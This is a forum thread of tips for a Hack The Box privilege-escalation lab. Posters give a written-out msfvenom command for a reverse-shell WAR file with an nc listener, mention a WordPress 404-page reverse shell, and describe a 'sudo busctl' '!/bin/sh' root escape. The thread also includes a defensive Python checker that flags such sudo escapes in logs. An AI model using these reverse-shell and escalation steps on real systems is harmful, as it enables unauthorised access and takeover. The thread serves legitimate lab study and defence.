For anyone else getting stuck on getting flag5 - I’ve just spent the whole afternoon working this through and here are my tips (I used msf to get my initial shell with the t****t user):
Initiate a secondary reverse shell from the msfconsole (I could not get the interactive tty to work from within msf);
Once you have your secondary shell (with nc), follow the instructions in the URL below to make the shell interactive. NOTE - if you are getting an error message about the terminal type being incorrect, skip the reset command and jump straight into the setting of the variables: Upgrading Simple Shells to Fully Interactive TTYs - ropnop blog
You should now be able to run your sudo command. If you get an error about the terminal not being fully functional, this step WON’T WORK!! Use the guidance in GTFOBins to provide the argument you need
If the last step is successful, you should end up with a line at the bottom prompting you about what line you are currently viewing - if the output you’ve received is complete you will need to reduce your stty row arguments until you do.
I hope this helps someone, happy to try and answer questions if anyone has any. I found this assessment pretty maddening!
Btw there is an alternate solution to this. If you check the version of ‘sudo’ running on the machine, you’ll quickly realize that it is vulnerable and there are exploits for it
Not able to find information relevant to user “barry” from “htb-student” user.
Checked the bash_history, checked the cache, config, everything.
Even went through the files in /var/www/html. Still unable to find anything which would give me access to “barry” account.
There’s a vhost running wordpress. You have to utilize a very basic attack, log in and fire a revshell by overwriting 404 page of a theme. This will land you a shell as www-data. From that point everything is the same as you were htb-student user.
This was helpful; thank you! To clarify a point that tripped me up:
Once you have an interactive shell as tomcat, you can run sudo busctl --show-machine.
You will get a warning here, too, about the terminal not being fully functional.
At this point, you can spawn a new shell as root using the command !/bin/sh as explained at busctl | GTFOBins.
From here, you can get flag5. If you want, you can upgrade this root shell too, but it isn’t necessary to navigate to /root/
Well done to anyone who gets up to flag5. It is relatively harder than the first four. If you need help, and you’re reading this within a few days of me posting it, feel free to message me (any later after that, and I’ve probably forgotten and moved on to other modules)
Note if you’re struggling to get a shell as tomcat (flag4)
Once you have the tomcatadm credentials, open up a browser and poke around. You can then pop a reverse shell by uploading a malicious war file.
No doubt you know how to do that if you’ve come this far but just in case, it can easily be done using msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=your-ip-address LPORT=your-port -f war > shell.war
Then you can simply deploy it through the Tomcat Web Application Manager page after you set up a listener nc -lvnp XXXX.
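As an added example from the defender's side (not code from this thread, HTB or GTFOBins), here is a small Python checker that flags the sudo busctl pattern described above in auth.log-style sudo records; the log lines are constructed samples, and the list of pager-backed binaries beyond busctl is my own assumption.

```python
import re

# Constructed sample lines in the standard sudo syslog format; not taken from the thread.
SAMPLE_AUTH_LOG = """\
Jan 10 10:01:02 box sudo:   tomcat : TTY=pts/1 ; PWD=/opt/tomcat ; USER=root ; COMMAND=/usr/bin/busctl --show-machine
Jan 10 10:03:15 box sudo: htb-student : TTY=pts/0 ; PWD=/home/htb-student ; USER=root ; COMMAND=/usr/bin/apt update
Jan 10 10:05:40 box sudo:   tomcat : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/busctl --show-machine
Jan 10 10:07:01 box sudo:   tomcat : TTY=pts/1 ; PWD=/opt/tomcat ; USER=root ; COMMAND=/usr/bin/systemctl status tomcat
"""

# Fields sudo logs for every accepted command: invoking user, tty, cwd, target user, command line.
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# Binaries that hand output to a pager and so can be broken out of with "!/bin/sh" under sudo.
# busctl is the one used on this box; the others are documented the same way on GTFOBins (assumed set).
PAGER_ESCAPE_BINARIES = {"busctl", "systemctl", "journalctl", "less", "more", "man"}

def parse_sudo_line(line):
    """Return the sudo record fields as a dict, or None for a line that is not a sudo record."""
    m = SUDO_RE.search(line)
    return m.groupdict() if m else None

def flag_sudo_escapes(log_text):
    """Report sudo-to-root runs of pager-backed binaries. The escape needs a working
    terminal (the thread's "terminal not fully functional" warning is the failure mode),
    so a real pty marks the event high priority; TTY=unknown usually means a cron job."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_sudo_line(line)
        if rec is None or rec["target"] != "root":
            continue
        binary = rec["cmd"].split()[0].rsplit("/", 1)[-1]
        if binary not in PAGER_ESCAPE_BINARIES:
            continue
        findings.append({
            "user": rec["user"],
            "binary": binary,
            "interactive_tty": rec["tty"] != "unknown",
            "command": rec["cmd"],
        })
    return findings

if __name__ == "__main__":
    for f in flag_sudo_escapes(SAMPLE_AUTH_LOG):
        print(("HIGH " if f["interactive_tty"] else "low  ") + f["user"] + " ran " + f["command"])
```

The same sudoers entry that makes this box solvable is the thing to fix: a rule granting root for a pager-backed binary is a shell grant in disguise.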
Hi, everyone. If you are stuck at the sudo busctl step, remember to type the gtfobins commands one after another without exiting the busctl program.
On that note, I’ve found every flag but flag1.txt. Even with root privileges searching the entire filesystem for hidden files it doesn’t show up anywhere other than in the htb-student’s log. Is it going to be in a generic container, or am I not on the right track?
It is the first flag, which means you shouldn’t have to elevate your privs in order to find it!
An educated guess would be to inspect your own home folder, and recursively do the same for the folders you may encounter… anything which is unusual should be among your first priorities for searching.
In case you want to use the big guns, you could try find: find / -name flag1.txt 2>/dev/null
I remember I tried to script a little loop in this particular case: for i in {1..5}; do find / -name "flag*.txt" 2>/dev/null | grep "flag$i"; done
In case you can’t find a file, this is most probably because you do not have the required permissions with the current user. That’s why I couldn’t even list the flag5.txt file at first, whereas even if I couldn’t read the other flags, I could at least list them in their proper location… which ultimately gave me hints on how I could move laterally to target the right user to read the flags, one after another.
I hope this helps in understanding how these flags work in this exercise…
Thank you so much!
I can’t believe it, the flag was right there in front of me. Funnily enough flag5 was the first flag I found and flag1 the last flag.
But thanks again it did make me understand how the flag works here
I was on the last user account for so long and was looking for a way to laterally move for hours because that user never has these perms. I dunked myself.